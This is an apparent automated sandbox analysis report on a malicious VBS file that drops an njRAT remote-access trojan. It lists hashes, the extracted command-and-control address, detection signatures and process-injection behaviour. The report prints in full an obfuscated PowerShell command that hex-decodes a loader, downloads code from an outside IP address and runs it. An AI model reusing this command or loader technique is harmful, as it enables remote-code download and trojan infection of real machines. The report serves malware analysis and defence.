Analysis
-
max time kernel
144s -
max time network
168s -
platform
windows7_x64 -
resource
win7v20210408 -
submitted
08-09-2021 05:28
Static task
static1
Behavioral task
behavioral1
Sample
Apartment.vbs
Resource
win7v20210408
General
-
Target
Apartment.vbs
-
Size
2KB
-
MD5
9733443c62fad16ef1c7412f1189b0ea
-
SHA1
7ffc31b99c0af85be17e8fe1a0d7ffdbfff3af43
-
SHA256
5eb13a8dd4cc2a1b7a265ab3489b651ceb4679742822bdada781f672dcce9d6e
-
SHA512
9088b1b27450532f0d509e7dcf14ed9cc22a23f1400c162046d332aad28c7ea0c9c4dff66609d8ec9c941eb3f183ab873b67aa099204ad70d9ac90c90f3e3001
Malware Config
Extracted
http://54.184.87.30/dddbypass.txt
Extracted
njrat
v4.0
Boss
103.147.184.73:7103
Windows
-
reg_key
Windows
-
splitter
|-F-|
Signatures
-
suricata: ET MALWARE Generic njRAT/Bladabindi CnC Activity (ll)
suricata: ET MALWARE Generic njRAT/Bladabindi CnC Activity (ll)
-
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exeflow pid process 6 1968 powershell.exe 7 1968 powershell.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 1968 set thread context of 1292 1968 powershell.exe aspnet_compiler.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepid process 1968 powershell.exe 1968 powershell.exe -
Suspicious use of AdjustPrivilegeToken 26 IoCs
Processes:
powershell.exeaspnet_compiler.exedescription pid process Token: SeDebugPrivilege 1968 powershell.exe Token: SeDebugPrivilege 1292 aspnet_compiler.exe Token: 33 1292 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 1292 aspnet_compiler.exe Token: 33 1292 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 1292 aspnet_compiler.exe Token: 33 1292 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 1292 aspnet_compiler.exe Token: 33 1292 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 1292 aspnet_compiler.exe Token: 33 1292 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 1292 aspnet_compiler.exe Token: 33 1292 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 1292 aspnet_compiler.exe Token: 33 1292 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 1292 aspnet_compiler.exe Token: 33 1292 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 1292 aspnet_compiler.exe Token: 33 1292 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 1292 aspnet_compiler.exe Token: 33 1292 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 1292 aspnet_compiler.exe Token: 33 1292 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 1292 aspnet_compiler.exe Token: 33 1292 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 1292 aspnet_compiler.exe -
Suspicious use of WriteProcessMemory 12 IoCs
Processes:
WScript.exepowershell.exedescription pid process target process PID 1828 wrote to memory of 1968 1828 WScript.exe powershell.exe PID 1828 wrote to memory of 1968 1828 WScript.exe powershell.exe PID 1828 wrote to memory of 1968 1828 WScript.exe powershell.exe PID 1968 wrote to memory of 1292 1968 powershell.exe aspnet_compiler.exe PID 1968 wrote to memory of 1292 1968 powershell.exe aspnet_compiler.exe PID 1968 wrote to memory of 1292 1968 powershell.exe aspnet_compiler.exe PID 1968 wrote to memory of 1292 1968 powershell.exe aspnet_compiler.exe PID 1968 wrote to memory of 1292 1968 powershell.exe aspnet_compiler.exe PID 1968 wrote to memory of 1292 1968 powershell.exe aspnet_compiler.exe PID 1968 wrote to memory of 1292 1968 powershell.exe aspnet_compiler.exe PID 1968 wrote to memory of 1292 1968 powershell.exe aspnet_compiler.exe PID 1968 wrote to memory of 1292 1968 powershell.exe aspnet_compiler.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Apartment.vbs"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $TRUMP ='http://54XXX184XXX87XXX30/dddbypassXXXtxt'.Replace('XXX','.');$Shib='2%###%2###20###3d###27###%5###5%###%8###20###%3###%f###%9###%e###7%###2e###57###5%###%6###20###%3###%f###%9###%e###6c###%9###%f###53###%e###5%###27###2e###52###65###70###6c###61###63###65###28###27###%5###5%###%8###20###%3###%f###%9###%e###27###2c###27###6e###%5###27###29###2e###52###65###70###6c###61###63###65###28###27###5%###%6###20###%3###%f###%9###%e###27###2c###27###%5###62###%3###27###29###2e###52###65###70###6c###61###63###65###28###27###%f###53###27###2c###27###65###27###29###3b###2%###%3###%3###20###3d###20###27###%%###%f###53###20###%3###%f###%9###%e###20###%c###53###%f###53###%3###%f###%9###%e###6e###%7###27###2e###52###65###70###6c###61###63###65###28###27###53###20###%3###%f###%9###%e###20###27###2c###27###57###6e###27###29###2e###52###65###70###6c###61###63###65###28###27###53###%f###27###2c###27###6f###61###%%###27###29###2e###52###65###70###6c###61###63###65###28###27###%3###%f###%9###%e###27###2c###27###5%###72###%9###27###29###3b###2%###%1###20###3d###27###%9###60###%5###6f###73###20###%3###%f###%9###%e###60###57###60###%2###5%###%3###20###%3###%f###%9###%e###6a###60###%5###5%###%8###20###%3###%f###%9###%e###20###2%###%2###29###2e###2%###%3###%3###28###2%###5%###52###55###%d###50###29###27###2e###52###65###70###6c###61###63###65###28###27###6f###73###20###%3###%f###%9###%e###27###2c###27###58###28###6e###60###65###27###29###2e###52###65###70###6c###61###63###65###28###27###%2###5%###%3###20###%3###%f###%9###%e###27###2c###27###2d###%f###62###27###29###2e###52###65###70###6c###61###63###65###28###27###5%###%8###20###%3###%f###%9###%e###27###2c###27###60###63###60###5%###27###29###3b###26###28###27###%9###27###2b###27###%5###58###27###29###28###2%###%1###20###2d###%a###6f###69###6e###20###27###27###29###7c###26###28###27###%9###27###2b###27###%5###58###27###29###3b'.Replace('%','4');Invoke-Expression (-join ($Shib -split '###' | ? { $_ } | % { [char][convert]::ToUInt32($_,16) }))2⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/1292-95-0x0000000000480000-0x0000000000481000-memory.dmpFilesize
4KB
-
memory/1292-94-0x0000000075801000-0x0000000075803000-memory.dmpFilesize
8KB
-
memory/1292-92-0x0000000000400000-0x000000000040E000-memory.dmpFilesize
56KB
-
memory/1292-91-0x000000000040836E-mapping.dmp
-
memory/1292-90-0x0000000000400000-0x000000000040E000-memory.dmpFilesize
56KB
-
memory/1828-60-0x000007FEFB631000-0x000007FEFB633000-memory.dmpFilesize
8KB
-
memory/1968-73-0x000000001AAB0000-0x000000001AAB1000-memory.dmpFilesize
4KB
-
memory/1968-87-0x000000001AB2A000-0x000000001AB49000-memory.dmpFilesize
124KB
-
memory/1968-69-0x000000001C600000-0x000000001C601000-memory.dmpFilesize
4KB
-
memory/1968-70-0x000000001A8C0000-0x000000001A8C1000-memory.dmpFilesize
4KB
-
memory/1968-66-0x000000001AB20000-0x000000001AB22000-memory.dmpFilesize
8KB
-
memory/1968-85-0x000000001AAF0000-0x000000001AAF1000-memory.dmpFilesize
4KB
-
memory/1968-86-0x000000001AB00000-0x000000001AB01000-memory.dmpFilesize
4KB
-
memory/1968-68-0x00000000027E0000-0x00000000027E1000-memory.dmpFilesize
4KB
-
memory/1968-88-0x000000001C760000-0x000000001C761000-memory.dmpFilesize
4KB
-
memory/1968-89-0x000000001A8A0000-0x000000001A8A4000-memory.dmpFilesize
16KB
-
memory/1968-67-0x000000001AB24000-0x000000001AB26000-memory.dmpFilesize
8KB
-
memory/1968-65-0x00000000027B0000-0x00000000027B1000-memory.dmpFilesize
4KB
-
memory/1968-64-0x000000001ABA0000-0x000000001ABA1000-memory.dmpFilesize
4KB
-
memory/1968-63-0x0000000002360000-0x0000000002361000-memory.dmpFilesize
4KB
-
memory/1968-61-0x0000000000000000-mapping.dmp